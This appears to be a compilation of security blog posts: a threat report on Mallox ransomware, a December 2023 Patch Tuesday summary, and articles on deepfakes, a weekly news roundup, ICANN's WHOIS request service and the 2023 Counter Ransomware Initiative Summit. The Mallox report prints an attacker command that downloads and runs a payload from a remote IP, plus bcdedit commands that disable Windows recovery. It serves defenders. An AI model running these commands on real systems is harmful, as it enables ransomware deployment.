Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises

The ransomware landscape is characterized by a heavy churn in both actor groups and malware families, with only a few players exhibiting relative longevity. Once feared threats such as REvil and Conti have either been dismantled or dissolved, while others – ALPHV, Black Basta and LockBit, for example – continue to extort businesses with impunity. To this second list we can also add Mallox (aka TargetCompany), a lesser-known but long-running ransomware threat first seen in 2021. Today, the group continues to steal and leak a steady stream of enterprise data.

In this post, we highlight recent Mallox activity, explain the group’s initial access methods and provide a high-level analysis of recent Mallox payloads to help defenders better understand and defend against this persistent threat.

Mallox Ransomware Overview

Operating under a Ransomware-as-a-Service (RaaS) model, Mallox leverages well-known underground forums and markets such as Nulled and RAMP to advertise its service and recruit affiliates. The group maintains a TOR-based leaks site where it regularly makes announcements about recently compromised organizations and exposes stolen data. Mallox also maintains a presence on Twitter/X for similar purposes.

Mallox on social media platform X/Twitter

Initial Access | Focus on MS-SQL & Brute Force Attacks

Mallox primarily gains initial access through the exploitation of vulnerable and publicly exposed services, with a particular focus on MS-SQL (Microsoft SQL Server) and ODBC (Open Database Connectivity) interfaces. Specific vulnerabilities are targeted, including unpatched instances of old remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.

In addition, the group makes successful use of brute force attacks against weakly configured services and applications open to the public internet. In recent campaigns Mallox actors gained initial access through dictionary-based brute-force attacks against weak MS-SQL interfaces. However, other vectors are known to be used by Mallox affiliates, including phishing emails to deliver attack frameworks such as Cobalt Strike and Sliver.

Post-Compromise Attack Behavior

After gaining initial access, Mallox threat actors typically execute PowerShell commands to run various batch scripts and download the ransomware payload.

Scripts such as Kill-Delete.bat or Bwmeldokiller.bat are used to terminate or remove running processes that may interfere with or prevent the ransomware’s encryption routine.

Example of the kill-delete.bat script
Example of the kill-delete.bat script

Commands are executed to download and launch the ransomware payloads. The following provides a typical example:

/C echo $cl = New-Object System.Net.WebClient >%TEMP%updt.ps1 & 
echo $cl.DownloadFile("hXXp://80[.]66.75]]]].40/XXXXXXXXX.exe", "%TEMP%xxxx.exe") >> %TEMP%updt.ps1 & 
powershell -ExecutionPolicy Bypass %TEMP%updt.ps1 & 
WMIC process call create "%TEMP%XXXXXXXX.exe"

The command sequence first crafts a PowerShell script in the system’s temporary directory, leveraging the WebClient class to download an executable from a remote server. The updt.ps1 PowerShell script is executed with bypass execution policy restrictions, ensuring an unrestricted run. The script then employs Windows Management Instrumentation (WMIC) to execute the ransomware payload.

Recent Payloads | Mallox.Resurrection

Mallox variants from 2021 to today display a highly consistent set of core functionalities, indicating that threat actors continue to achieve success with a tried and tested formula. Recent payloads are labeled “Mallox.Resurrection”, reflecting a change in the ransom notes deposited after encryption.
Hard-coded exclusions exempt a number of file types and processes from encryption. File types are excluded through named extensions:

.386 .adv .ani .avast .bat .bin .cab .cmd .com .cpl .cur 
.deskthemepack .diagcfg .diagpkg .diangcab .dll .drv .exe 
.Globeimposter-Alpha865qqz .hlp .hta .icl .icns .ico .ics .idx 
.key .lnk .lock .mallox .mallox .mod .mpa .msc .msi .msp .msstyles 
.msu .nls .nomedia .ocx .prf .ps1 .rom .rtp .scr .shs .spl .sys .theme .themepack .wpx 

Processes are excluded or ignored based on the existence of certain strings in the path name (e.g., “Windows Defender” ).

"$windows ~bt"                  "Package Store"
"$windows ~ws"                  "Package"
"appdata"                       "perflogs"
"application data"              "programdata"
"Assemblies"                    "Reference"
"boot"                          "Store"
"boot"                          "system volume information"
"Common Files"                  "tor browser"
"Core Runtime"                  "Windows
"google"                        "Windows Defender"
"intel"                         "Windows Kits"
"Internet Explorer"             "Windows Mail"
"Microsoft Analysis Services"   "Windows Microsoft NET"
"Microsoft ASP NET"             "Windows NT"
"Microsoft Help Viewer"         "Windows Photo Viewer"
"Microsoft MPI"                 "Windows Portable Devices"
"Microsoft Security Client"     "windows old"
"Microsoft Security Client"     "Windows"
"Microsoft NET"                 "WindowsPowerShell"
"mozilla"

Upon launch, the ransomware spawns the following commands:

bcdedit.exe  /set {current} bootstatuspolicy ignoreallfailures
bcdedit.exe  /set {current} recoveryenabled no

These serve to alter the Boot Configuration Data (BCD) settings, affecting the OS’s ability to recover from failure and preventing administrators from restoring the system with Windows built-in tools.

Encrypted files are appended with the .mallox extension, and a ransom note with the file name “HOW TO BACK FILES.TXT” is written to each folder containing locked files. The ransom note contains instructions on how to obtain a decryption tool using TOR and contains a TargetID, a unique identifier for the victim. Beginning in mid 2023, we observed that the contact email in the Mallox ransom notes changed from “mallox@onionmail” to “mallox.resurrection@onionmail.org”

In addition to the ransom notes, a file called “Targetinfo.txt” is written to the user’s Desktop. This file also contains the TargetID along with basic details of the host’s environment (OS version, architecture, hostname, etc.)

Example of a Mallox.Resurrection ransom note
Example of a Mallox.Resurrection ransom note

Victims who do not respond to the ransom demand are threatened with exposure of their data on the group’s data leak site.

Mallox Data Leak Site
Mallox Data Leak Site

Conclusion

Despite previously suffering setbacks such as the release of a public decryptor for earlier versions of its payloads, Mallox has maintained a steady stream of compromises and iterated on successful versions of its ransomware. The continued abuse of unpatched MS-SQL interfaces and brute-forcing of weak passwords suggests the group sees little need to alter its MO while organizations leave such a fruitful avenue open to exploitation.

The group’s longevity provides a sharp reminder that cybersecurity basics will go a long way to keeping such threats at bay. Reviewing and hardening applications and services exposed to the public internet is strongly recommended, along with deployment of appropriate endpoint and cloud security solutions like SentinelOne.

All SentinelOne customers are protected from Mallox ransomware.

To learn about how SentinelOne can help protect the devices in your fleet from ransomware and other threats, contact us or request a free demo.

Indicators of Compromise

3d434b7cc9589c43d986bf0e1cadb956391b5f9a  updt.ps1
9295a02c49aa50475aa7876ca80b3081a361ff7d  updt.ps1

3fa79012dfdac626a19017ed6974316df13bc6ff  Bwmeldokiller.bat
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196  Kill-Delete.bat

Mallox Ransomware Payloads
08a236455490d5246a880821ba33108c4ef00047
0d2711c5f8eb84bd9915a4191999afd46abca67a
0e45e8a5b25c756f743445f0317c6352d3c8040a
11d7779e77531eb27831e65c32798405746ccea1
246e7f798c3bfba81639384a58fa94174a08be80
273e40d0925af9ad6ca6d1c6a9d8e669a3bdc376
2a6f632ab771e7da8c551111e2df786979fd895d
2c49fa21b0a8415994412fe30e023907f8a7b46e
33c24486f41c3948fbd761e6f55210807af59a1f
4c863df8ea7446cb7fba6e582959bc3097f92b5c
4fcfb65cb757c83ed91bc01b3f663072a52da54b
5229a5d56836c3d3fc7fb12a43a431b5c90f771d
552862af77b204ac1f69b9e25937cc60e30e6c0f
5d0b9521cca0c911d49162e7f416a1463fbaefae
5d9cc0bc652b1d21858d2e4ddd35303cd9aeb2a3
63408c84c5d642cf1c5b643a97b84e22e18323c0
643918830b87691422d6d7bd669c408679411303
65d7cb5f1770b77b047baf376bd6b4cf86c5d42c
88eef50d85157f2e0552aab07cac7e7ec21680f5
88f8629423efe84e2935eb71d292e194be951a16
9d182e17f88e26cb0928e8d07d6544c2d17e99f5
a8886c9417b648944d2afd6b6c4941588d670e3c
db3fd39fc826e87fa70840e86d5c12eef0fe0566
ee15c76e07051c10059a14e03d18a6358966e290
fb05a6fafc28194d011a909d946b3efa64cdb4cf

Mallox DLS (Data Leak Site)
http[:]//wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion/

Mallox Distro / C2 IP Addresses
104[.]21.76.77
104[.]237.62.211
172[.]67.191.103
64[.]185.227.155
80[.]66.75.37

Microsoft Patch Tuesday, December 2023 Edition

The final Patch Tuesday of 2023 is upon us, with Microsoft Corp. today releasing fixes for a relatively small number of security holes in its Windows operating systems and other software. Even more unusual, there are no known “zero-day” threats targeting any of the vulnerabilities in December’s patch batch. Still, four of the updates pushed out today address “critical” vulnerabilities that Microsoft says can be exploited by malware or malcontents to seize complete control over a vulnerable Windows device with little or no help from users.

Among the critical bugs quashed this month is CVE-2023-35628, a weakness present in Windows 10 and later versions, as well as Microsoft Server 2008 and later. Kevin Breen, senior director of threat research at Immersive Labs, said the flaw affects MSHTML, a core component of Windows that is used to render browser-based content. Breen notes that MSHTML also can be found in a number of Microsoft applications, including Office, Outlook, Skype and Teams.

“In the worst-case scenario, Microsoft suggests that simply receiving an email would be enough to trigger the vulnerability and give an attacker code execution on the target machine without any user interaction like opening or interacting with the contents,” Breen said.

Another critical flaw that probably deserves priority patching is CVE-2023-35641, a remote code execution weakness in a built-in Windows feature called the Internet Connection Sharing (ICS) service that lets multiple devices share an Internet connection. While CVE-2023-35641 earned a high vulnerability severity score (a CVSS rating of 8.8), the threat from this flaw may be limited somewhat because an attacker would need to be on the same network as the target. Also, while ICS is present in all versions of Windows since Windows 7, it is not on by default (although some applications may turn it on).

Satnam Narang, senior staff research engineer at Tenable, notes that a number of the non-critical patches released today were identified by Microsoft as “more likely to be exploited.” For example, CVE-2023-35636, which Microsoft says is an information disclosure vulnerability in Outlook. An attacker could exploit this flaw by convincing a potential victim to open a specially crafted file delivered via email or hosted on a malicious website.

Narang said what makes this one stand out is that exploitation of this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

”It is reminiscent of CVE-2023-23397, an elevation of privilege vulnerability in Microsoft Outlook that was exploited in the wild as a zero day and patched in the March 2023 Patch Tuesday release,” Narang said. “However, unlike CVE-2023-23397, CVE-2023-35636 is not exploitable via Microsoft’s Preview Pane, which lowers the severity of this flaw.”

As usual, the SANS Internet Storm Center has a good roundup on all of the patches released today and indexed by severity. Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Beyond Illusion | Addressing the Cybersecurity Impact of Deepfakes and Synthetic Media

In the last few years, slowly but steadily, the boundary between reality and fiction in the digital realm has become increasingly blurred thanks to the advent of deepfake technology.

Sophisticated, AI-powered synthetic media has evolved from a novel concept in Hollywood to a practical tool used daily by politically-motivated threat actors and cybercriminals for misinformation and fraud.

Since we last wrote about deepfakes a lot has changed. There are new powerful actors, with both old and new grievances, and of course, an explosion in the availability and capabilities of AI. Our trust in the veracity of what we see online has never been lower, nor more fragile.

In this post, we delve into the world of deepfakes as we see it today, exploring the nature, risks, real-life impacts, and measures needed to counter these advanced threats.

What Are Deepfakes?

Deepfakes are artificially-created media, typically video and audio, that purport to show events or people engaging in behaviors that never in fact occurred. They leverage sophisticated artificial intelligence (AI) and machine learning technologies, in particular generative adversarial networks (GANs).

GANs involve two AI models: one that generates content (the generator) and another that evaluates its authenticity (the discriminator). The generator creates increasingly realistic fake videos or audio, while the discriminator continuously assesses the content’s verisimilitude, leading to a rapid improvement in the quality and believability of the generated fakes.

Originally, deepfakes found their place in entertainment and social media, providing novel ways to create content, like superimposing celebrities’ faces onto different bodies in videos or enabling realistic voice impersonations. However, this technology’s potential for creating highly convincing forgeries soon transitioned from mere novelty to a potent tool for misinformation and manipulation.

The Cybersecurity Risks of Deepfakes | A Broad Spectrum

From political disinformation to financial deception, the ramifications of deepfakes are far-reaching and multifaceted. Let’s explore some key examples to understand the breadth and depth of these risks.

Political Disinformation

Deepfakes pose a significant risk to political stability by spreading false narratives and manipulating public opinion, particularly when they are used to create misleading representations of political figures. The first notable example occurred in 2018, when BuzzFeed released a deepfake of President Obama.

Since then, many others have come to light; a deepfake video of Ukrainian President Volodymyr Zelensky falsely portrayed him as conceding defeat and urging Ukrainians to surrender to Russia. Aimed at misleading and demoralizing the public, the video was identified as fake due to discrepancies such as the mismatched size of Zelensky’s head to his body.

Corporate Espionage

In the corporate world, deepfakes have emerged as tools for fraud and deception with the potential to cause substantial financial losses. Such scams can be particularly effective when impersonating high-level executives. A UK-based energy firm lost €220,000 after AI software was used to imitate the voice of the CEO of the firm’s German parent company and instruct the UK CEO to urgently transfer funds.

Personal Identity Theft and Harassment

Personal rights and privacy are, of course, highly susceptible to harm from fake media when it is used to commit identity theft and harassment. Malicious media creations can be alarmingly realistic. In Germany, the government was so concerned about the threat of deepfakes that it released an ad campaign to highlight the dangers, warning parents about the risks associated with these technologies.

Financial Market Manipulation

Beyond harm to individual persons or organizations, deepfakes can disrupt entire financial markets by swaying investor decisions and market sentiments with false narratives. An illustrative case was the deepfake video depicting a supposed explosion near the Pentagon, which briefly impacted the US stock markets.

Legal and Judicial Misuse

In the legal domain, deepfakes can be used to fabricate evidence, potentially leading to miscarriages of justice and undermining the integrity of judicial processes. Although a specific widespread instance in legal settings is yet to occur, the potential for deepfakes to be used in this manner raises concerns about the reliability of video and audio evidence in courtrooms and the need for enhanced verification measures to ensure judicial integrity.

Detecting and Combating Deepfakes | On the Cybersecurity Frontline

As with any tool, AI can be used for both good and bad, and there are efforts underway to develop AI-driven methods to detect and combat the threat of deepfakes. Many of these efforts focus on analyzing facial expressions and voice biometrics to spot subtle anomalies that are undetectable to the human eye and ear. This involves using machine learning models and training them on extensive datasets containing both genuine and manipulated media in order to effectively distinguish between the two.

Blockchain technology, more typically associated with cryptocurrencies, is also emerging as a useful tool in this fight. Blockchain provides a way to verify the source and authenticity of media files and confirm whether they have been altered. So-called “smart contracts” can be used both to verify the authenticity of digital content and to trace how it is interacted with, including any modifications. Combined with AI that can flag media content as potentially inauthentic, a smart contract can trigger a review process or alert relevant authorities or stakeholders.

Other tools are being developed to ensure that content created by AI platforms can be detected as artificial. For example, Google’s SynthID can embed inaudible “watermarks” in AI-generated audio content. Methods like SynthID are intended to ensure that content generated by AI tools remains reliably detected as artificially generated even after it has been manipulated by humans or other editing software.

As in other areas of cybersecurity, education and awareness campaigns have an important part to play in combating the threat of deepfakes. Educating individuals and organizations about deepfakes, how to spot them, and their potential impact will be essential. Collaborations between technology companies, cybersecurity experts, government agencies, and educational institutions will prove to be vital over the next few years as we strive to develop more comprehensive strategies to combat artificially-generated content used for ill ends.

Best Practices for Organizations and Individuals in the Era of Deepfakes

As the threat landscape shaped by deepfakes continues to evolve, it is increasingly important to adopt strategies to mitigate risks associated with the misuse of AI technology. Here is our guide to current best practices and measures to enhance resilience against deepfake-related security threats.

Raising Awareness and Training

Education is the cornerstone of defense against deepfakes. Conducting regular training sessions for employees to recognize deepfakes can significantly lower the risk of deception. This training should focus on the subtleties of synthetic media and keep abreast of the latest developments in deepfake technology.

Cultivating a verification culture within organizations, where any unusual or suspicious communication, particularly involving sensitive information, is cross-verified through multiple channels, is also crucial.

Implementing Robust Verification Processes

For critical communications, especially in financial and legal contexts, implementing multi-factor authentication and rigorous verification processes is indispensable. For instance, voice and video call confirmations for high-stake transactions or sensitive information sharing can be effective. Such practices can prevent incidents similar to the aforementioned case in which a CEO’s voice was faked for fraudulent activities.

Utilizing Advanced Cybersecurity Solutions

We can leverage AI to defeat AI by incorporating advanced cybersecurity solutions with deepfake detection capabilities. Tools employing AI and machine learning to analyze and flag potential deepfakes add an important layer of security.

Regular Software and Security Updates

Maintaining up-to-date software, including security solutions, is vital for cybersecurity. Updates often contain patches for newly identified vulnerabilities that could be exploited by deepfakes and other cyber threats. A proactive stance on software updates can significantly reduce the likelihood of security breaches.

Collaborating with External Experts

For organizations, particularly those with limited in-house cybersecurity capabilities, partnering with external security experts can offer enhanced protection. These professionals can provide insights into the latest threats and assist in crafting strategies specifically designed to counter deepfakes and other emerging cyber risks.

Personal Vigilance

As individuals, it is important for all of us to maintain vigilance when engaging with media. This includes maintaining a healthy skepticism towards sensational or controversial content and verifying sources before sharing or acting on such information.

Utilizing tools and browser extensions that assist in detecting deepfakes can also contribute to stronger personal cybersecurity practices.

It’s also worth remembering that, like any other creation, deepfakes come with varying degrees of quality and attention to detail from the creator. That means in some cases it is still possible to spot less-advanced or sophisticated deepfakes. Some things to watch out for include:

  • Unnatural Eye Movements: AI-generated images or videos can fail to accurately replicate intricate and natural eye movements. This discrepancy can manifest as unusual blinking patterns or a lack of natural eye movement.
  • Audio-Video Sync Issues: Some deepfakes can fail to sync spoken words and lip movements, leading to noticeable discrepancies.
  • Color and Shadow Inconsistencies: AI often struggles with consistently rendering colors and shadows, especially in varying lighting conditions. Look out for inconsistencies in skin tones or background colors. Shadows might appear misplaced or of the wrong intensity.
  • Unusual Body Movements: AI might also struggle to maintain the consistency of body shapes, leading to noticeable distortions or irregularities. This might include jerky, unnatural movements or expressions that don’t align with how a person typically moves or reacts.

In short, combating deepfakes requires a multi-faceted approach, combining education, robust verification processes, advanced technology, software maintenance, expert collaboration, and personal vigilance. These practices form an integral part of a comprehensive strategy to counter the growing sophistication of deepfakes in the cybersecurity landscape. As a bonus, they will also help protect against other kinds of cybersecurity threats and serve to encourage the security mindset individuals and organizations need in today’s digital-centric world.

The Future of Deepfakes and Cybersecurity

The deepfake genie is out of the bottle and we cannot wish it away. Rather, as deepfakes become increasingly prevalent and ever-more subtle, we will need to evolve effective responses. This will entail development in certain key areas.

Aside from continued development of advanced authentication tools, industry leaders, including AI developers like OpenAI and cybersecurity firms, will need to steer the development and application of AI technologies to both establish ethical guidelines and ensure robust defense mechanisms against deepfake threats.

New legislation and regulations will also be required to prohibit and penalize the creation and dissemination of deepfakes for harmful purposes. Due to the transnational nature of digital media, international collaboration in legal frameworks will also be needed to effectively combat deepfakes.

As we’ve noted above, educating the public about deepfakes and enhancing media literacy are an integral part of countering the threat of manipulated media. Technology and regulation alone cannot win the fight across the broad spectrum of online surfaces in which misinformation can be disseminated.

The inevitable proliferation of deepfakes demands a multi-dimensional approach, combining technological innovations, ethical industry practices, informed legislative measures, and public education. We are only at the mercy of technology when we fail to take the time to understand its implications or develop the appropriate controls. When it comes to AI and deepfakes, we still have meaningful opportunities to do both.

The Good, the Bad and the Ugly in Cybersecurity – Week 49

The Good | Co-Founder of Criminal Crypto Exchange Pleads Guilty to Money-Laundering Schemes

Anatoly Legkodymov (aka “Gandalf” or “Tolik”), co-founder of the Bitzlato cryptocurrency exchange, has pleaded guilty to his role in aiding ransomware gangs and other cybercriminals in laundering over $700 million. Legkodymov has agreed to disband Bitzlato and forfeit his claim to approximately $23 million in seized assets, according to the terms of his plea agreement.

Source: Forbes

Bitzlato reportedly saw widespread illicit activity on its platform. The exchange promoted a user registration process with minimal identification requirements, explicitly stating that neither selfies nor passports were necessary. According to the DoJ, this lax approach led to Bitzlato becoming a haven for criminal proceeds and funds intended for a variety of malicious activities.

Reports on cryptocurrency-related illicit activity revealed that Bitzlato conducted over $2 billion in cryptocurrency transactions between 2019 to 2021 alone. Nearly 48% of this amount, approximately $966 million, was associated with high-risk cryptocurrency transactions and deemed illicit. The exchange received funds totaling $206 million from darknet markets, $224.5 million from scams, and $9 million from ransomware attackers.

The crypto exchange was also known to be particularly entwined with the Hydra Market, facilitating more than $700 million worth of cryptocurrency exchanges until the dark market was shut down by U.S. and German law enforcement in April 2022. The exchange also received millions in ransomware proceeds, despite repeated warnings to Legkodymov that the routed cryptocurrency represented the proceeds of crime and was intended for illicit transactions.

Dismantling Bitzlato’s digital infrastructure and the subsequent seizure of its domains was a collaborative effort from Europol and authorities in France, Spain, Portugal, and Cyprus. After his initial arrest in Miami earlier this year, Legkodymov now faces a maximum sentence of five years in prison for his role in the illicit activities associated with Bitzlato.

The Bad | APT28 Actors Re-Use Old Outlook Vulnerability to Access Polish Exchange Accounts

Security researchers have identified the Russian state-sponsored actor, APT28 (aka Fancy Bear or Sofacy), exploiting a recently-patched flaw (CVE-2023-23397) in Microsoft Outlook to gain unauthorized access to accounts within Exchange servers. Before it was fixed in March, targets spanned critical sectors in the United States, Europe, and the Middle East. Based on the new wave of attacks, Polish Cyber Command’s (DKWOC) reports that the attacker’s goal now is to obtain unauthorized access to mailboxes belonging to public and private entities that have yet to patch their instances.

CVE-2023-23397 is a critical-level (CVSS score: 9.8) elevation of privilege (EoP) vulnerability triggered by a specially-crafted email message that is sent to a targeted user. Once the message is opened, the user’s Net-NTLMv2 hash is transmitted to the attacker, allowing them to manipulate the access permissions of specific mailboxes and steal sensitive information and/or credentials.

Source: Microsoft

The state-sponsored group linked to APT28 has been active since 2008, known most widely for interfering in the 2016 U.S. presidential election and their engagement in various hack-and-leak operations. Their victims are typically high-value, coming from governments, military, and private sectors. Just two months ago, the National Cybersecurity Agency of France (ANSSI) pinned a cluster of attacks on agencies, universities, think tanks, and research institutions onto the threat group, where they leveraged a combination of flaws, including CVE-2023-23397, to deploy stealers in prominent web browsers.

APT28 commonly employs other known vulnerabilities as part of their attack methods, such as CVE-2023-38831 or CVE-2021-40444. The recent incidents underscore the persistent challenges posed by sophisticated state-sponsored threat actors and the importance of promptly applying security patches to mitigate the risk of exploitation.

The Ugly | Unidentified Actors Exploit Adobe ColdFusion Flaw to Breach U.S. Government Servers

Threat actors are actively exploiting a high-severity vulnerability found in Adobe’s ColdFusion to gain initial access into U.S. government servers. According to CISA’s latest warning on the mounting attacks, the flaw tracked as CVE-2023-26360 presents an improper access control issue that could lead to arbitrary code execution.

Source: CISA

The advisory highlights two incidents of exploitation where CVE-2023-26360 was utilized to compromise federal agency systems. Both instances involved outdated server software vulnerable to various CVEs, with threat actors leveraging the vulnerability to deploy malware through HTTP POST commands to the ColdFusion-associated directory path.

During the first incident, attackers breached a server running Adobe ColdFusion v2016.0.0.3. They performed process enumeration, network checks, and installed a web shell for code injection into a ColdFusion configuration file to extract credentials. The attackers then followed with tactics such as file deletion and creation in specific directories to conceal their activities.

The second incident involved attackers exploiting the flaw on a server running Adobe ColdFusion v2021.0.0.2. After gathering user account information, they deployed a remote access trojan in the form of a text file. Attempts were made to exfiltrate Registry files and security account manager (SAM) information, utilizing security tools to access a directory on domain controllers. Fortunately, both attacks were detected and thwarted before any data exfiltration or lateral movement occurred, with compromised assets removed from critical networks within 24 hours.

CISA categorizes these incidents as reconnaissance efforts, although it remains uncertain whether the same threat actor is responsible for both intrusions. To mitigate risks, CISA recommends updating ColdFusion to the latest version, implementing network segmentation, configuring firewalls or web application firewalls (WAFs), and enforcing policies for signed software execution.

ICANN Launches Service to Help With WHOIS Lookups

More than five years after domain name registrars started redacting personal data from all public domain registration records, the non-profit organization overseeing the domain industry has introduced a centralized online service designed to make it easier for researchers, law enforcement and others to request the information directly from registrars.

In May 2018, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — instructed all registrars to redact the customer’s name, address, phone number and email from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges.

ICANN made the policy change in response to the General Data Protection Regulation (GDPR), a law enacted by the European Parliament that requires companies to gain affirmative consent for any personal information they collect on people within the European Union. In the meantime, registrars were to continue collecting the data but not publish it, and ICANN promised it would develop a system that facilitates access to this information.

At the end of November 2023, ICANN launched the Registration Data Request Service (RDRS), which is designed as a one-stop shop to submit registration data requests to participating registrars. This video from ICANN walks through how the system works.

Accredited registrars don’t have to participate, but ICANN is asking all registrars to join and says participants can opt out or stop using it at any time. ICANN contends that the use of a standardized request form makes it easier for the correct information and supporting documents to be provided to evaluate a request.

ICANN says the RDRS doesn’t guarantee access to requested registration data, and that all communication and data disclosure between the registrars and requestors takes place outside of the system. The service can’t be used to request WHOIS data tied to country-code top level domains (CCTLDs), such as those ending in .de (Germany) or .nz (New Zealand), for example.

The RDRS portal.

As Catalin Cimpanu writes for Risky Business News, currently investigators can file legal requests or abuse reports with each individual registrar, but the idea behind the RDRS is to create a place where requests from “verified” parties can be honored faster and with a higher degree of trust.

The registrar community generally views public WHOIS data as a nuisance issue for their domain customers and an unwelcome cost-center. Privacy advocates maintain that cybercriminals don’t provide their real information in registration records anyway, and that requiring WHOIS data to be public simply causes domain registrants to be pestered by spammers, scammers and stalkers.

Meanwhile, security experts argue that even in cases where online abusers provide intentionally misleading or false information in WHOIS records, that information is still extremely useful in mapping the extent of their malware, phishing and scamming operations. What’s more, the overwhelming majority of phishing is performed with the help of compromised domains, and the primary method for cleaning up those compromises is using WHOIS data to contact the victim and/or their hosting provider.

Anyone looking for copious examples of both need only to search this Web site for the term “WHOIS,” which yields dozens of stories and investigations that simply would not have been possible without the data available in the global WHOIS records.

KrebsOnSecurity remains doubtful that participating registrars will be any more likely to share WHOIS data with researchers just because the request comes through ICANN. But I look forward to being wrong on this one, and will certainly mention it in my reporting if the RDRS proves useful.

Regardless of whether the RDRS succeeds or fails, there is another European law that takes effect in 2024 which is likely to place additional pressure on registrars to respond to legitimate WHOIS data requests. The new Network and Information Security Directive (NIS2), which EU member states have until October 2024 to implement, requires registrars to keep much more accurate WHOIS records, and to respond within as little as 24 hours to WHOIS data requests tied everything from phishing, malware and spam to copyright and brand enforcement.

The 2023 Counter Ransomware Initiative Summit | Stepping Up Global Collaboration in Cybersecurity

Ransomware’s transformation from a targeted cybercrime to a significant threat to national security has increasingly drawn attention at international forums like the Counter Ransomware Initiative (CRI) Summit. The 2023 Summit, which brought together representatives from 50 countries, signifies a growing, yet cautious, acknowledgment of the need for collaborative strategies in tackling this complex issue.

In this post, we discuss the key findings emerging from the Summit, shedding light on the collective approach adopted by nations to combat the surge in ransomware attacks. We’ll delve into the role of advancing technologies such as Artificial Intelligence (AI) in fortifying cybersecurity measures, the pivotal role of information sharing in preempting attacks, and the strategic policy initiatives aimed at undermining the operational frameworks of ransomware syndicates.

Furthermore, we’ll reflect on the real-world challenges in countering adaptive cyber threats and highlight the recent law enforcement breakthroughs against notable ransomware groups. This post explores the steps being taken at an international level to address the ransomware menace and the ongoing efforts to shape a more resilient global cybersecurity infrastructure.

Building Collective Resilience Against Ransomware

Member countries gathered in Washington D.C. on October 31 to November 1 to reinforce the need for a global front against the escalating ransomware crisis. Some of the key areas of discussion to emerge were:

  • Strengthening International Cooperation to Undermine Ransomware Operations:
    • The Summit emphasized the importance of unified efforts across nations. Recognizing that ransomware networks often transcend borders, it called for enhanced cross-border law enforcement collaboration.
    • Delegates discussed the standardization of legal frameworks and law enforcement protocols to ensure swift and coordinated action against ransomware syndicates.
    • The Summit also highlighted the need for streamlined processes for sharing intelligence and cyber forensics across countries to facilitate faster identification and neutralization of ransomware threats.
  • Tackling the Financial Underpinnings of the Ransomware Ecosystem:
    • A lot of discussion centered on disrupting the financial networks that fuel ransomware operations.
    • Experts and policymakers deliberated on strategies to trace and block the flow of ransom payments, which often involve cryptocurrencies and unregulated digital payment platforms.
    • There was a consensus on increasing collaboration with financial institutions and regulatory bodies to monitor and report suspicious transactions linked to ransomware activities.
  • Enhancing Public-Private Partnerships to Combat Ransomware Threats:
    • Recognizing the critical role of the private sector, particularly technology and cybersecurity firms, the Summit pushed for stronger partnerships between governments and private entities.
    • Discussions were held on creating frameworks for regular information exchange and threat intelligence sharing between public agencies and private companies.
    • The Summit also saw proposals for joint initiatives in developing advanced cybersecurity technologies, focusing on AI and machine learning, to stay ahead of ransomware tactics.

The Summit’s approach to building collective resilience against ransomware was multi-dimensional, acknowledging that tackling such a complex issue requires a blend of legal, financial, technological, and cooperative strategies. Concerted effort is needed to create a more robust and unified defense against the burgeoning threat of ransomware, which continues to challenge global security and economic stability.

The Evolving Role of AI in Cybersecurity

During the event, a significant spotlight was cast on using Artificial Intelligence (AI) and Machine Learning (ML) in the fight against ransomware. This focus underscores a broader shift in cybersecurity tactics, moving towards more proactive and adaptive defense mechanisms.

AI and ML: Enhancing Threat Detection and Response

  • Advanced Threat Detection: AI and ML algorithms can sift through vast data, identifying patterns and anomalies that may indicate a cybersecurity threat. This allows for early detection of potential ransomware attacks, even before they fully manifest.
  • Automated Response Systems: Integrating AI into cybersecurity systems creates the potential for automated responses to detected threats. This not only speeds up the reaction time but also helps mitigate the impact of attacks, especially in scenarios where every second counts.
  • Adapting to Evolving Threats: The dynamic nature of cyber threats, particularly ransomware, requires tools that can adapt and evolve. AI systems, with their learning capabilities, are well-positioned to meet this need. However, the effectiveness of these AI models in real-world applications is a continuous journey of refinement and improvement, given the ever-advancing tactics of cybercriminals.

Sharing Information | Building a Proactive Defense Network

The CRI Summit also underscored the importance of information sharing in building a collective defense against ransomware.

Rapid Exchange of Threat Data

  • International Information Sharing Platforms: The establishment of platforms for quick and efficient sharing of threat intelligence among CRI members is a step towards a more unified global response to cyber threats.
  • Enhancing Anticipatory Capabilities: With timely access to shared intelligence, countries and organizations can better anticipate and prepare for potential ransomware attacks.
  • Real-World Application: The true test of these information-sharing initiatives lies in their implementation and effectiveness in diverse real-world scenarios. Ensuring these platforms are accessible, efficient, and secure will be crucial in maximizing their impact.

Policy Initiatives and Ransomware Financing | Striking at the Core

A key outcome of the Summit was the formulation of decisive policy initiatives aimed at disrupting the financial lifeline of ransomware operations.

Disincentivizing Ransom Payments

  • No Ransom Payments: The CRI’s collective stance against paying ransoms aims to weaken the financial incentive for cybercriminals. This policy needs global support and enforcement to be effective.
  • Tracking Illicit Financial Transactions: The U.S. Treasury’s commitment to monitor and share information on illicit financial transactions is a strategic move to disrupt the economic foundations of ransomware operations.
  • Global Enforcement Challenges: Implementing these policies on a global scale presents challenges, particularly in jurisdictions with varying levels of cybercrime laws and enforcement capabilities. The effectiveness of these initiatives hinges on the cooperative efforts and compliance of all member states of the CRI.
Discussions highlighted the need for collective effort against ransomware, underscored the importance of AI in cybersecurity, the power of shared intelligence, and the need for robust policy measures. As these strategies are implemented, their real-world effectiveness and adaptability will play a crucial role in shaping the global response to the ransomware threat.

Conclusion

The 2023 Counter Ransomware Initiative (CRI) Summit marks a step in the right direction towards global collaboration against cyber threats. However, the reality remains that many organizations and critical infrastructures are still vulnerable, continuing to fuel the ransomware industry. Despite the advancements and strategic discussions at the Summit, the prevalence of these threats highlights the urgent need for comprehensive and proactive measures.

